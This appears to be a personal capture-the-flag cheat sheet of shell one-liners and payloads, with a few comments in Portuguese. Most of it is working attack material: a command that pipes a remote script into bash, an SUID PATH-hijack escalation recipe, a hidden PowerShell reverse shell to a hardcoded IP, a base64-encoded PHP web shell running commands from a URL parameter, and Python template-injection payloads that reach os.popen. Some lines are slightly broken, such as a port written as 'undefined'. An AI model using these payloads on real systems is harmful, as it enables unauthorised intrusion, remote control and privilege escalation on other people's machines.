/usr# TIPS FOR CTF 


CURL DOWNLOAD AND EXEC BASH:

curl -s http://mywebsite.com/myscript.txt | bash -s --

bash -c "curl -s http://mywebsite.com/myscript.txt | bash -s --" OR | php | sh

```

find / -type f -user root -perm /u+s -ls 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Do any of the SUID binaries run commands that are vulnerable to file path manipulation?
strings /usr/local/bin/binaryelf
mail
echo "/bin/sh" > /tmp/mail cd /tmp
export PATH=.
/usr/local/bin/binaryel`

```

--------------------------------------------------------------

gpg -c filename #ENCRYPT FILE WITH GPG

echo your_password | gpg --batch --yes --passphrase-fd 0 your_file.gpg #DECRYPT GPG FILE WITH CLEAN PASSWORD

--------------------------------------------------------------

PS1 SH

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('172.168.2.107', undefined);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

```

################## PHP BASE64 RUN ##############################

<?php eval(base64_decode("cHJpbnQoJ0Fsb2hhJyk7Cg=="));?>
echo "print('Aloha');" | base64
################################################################
<?php eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7Cg=="));?>
echo "system(\$_GET['cmd']);" | base64
#################################################################

wget -m -p -E -k -K -np #baixa todos os arquivos de um diretório.
find / -type f -exec grep -H 'text-to-find-here' {} \; #procura por determinado texto em todos os arquivos.


python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm


python callback function navigation:

nome.__class__
.mro()[1].__subclasses__()
[133].__init__
.__globals__['system']('id')

{{'alan'.__class__
.mro()[2].__subclasses__()
[131].__init__.__globals__['os']
.popen('pwd').read()}}
```
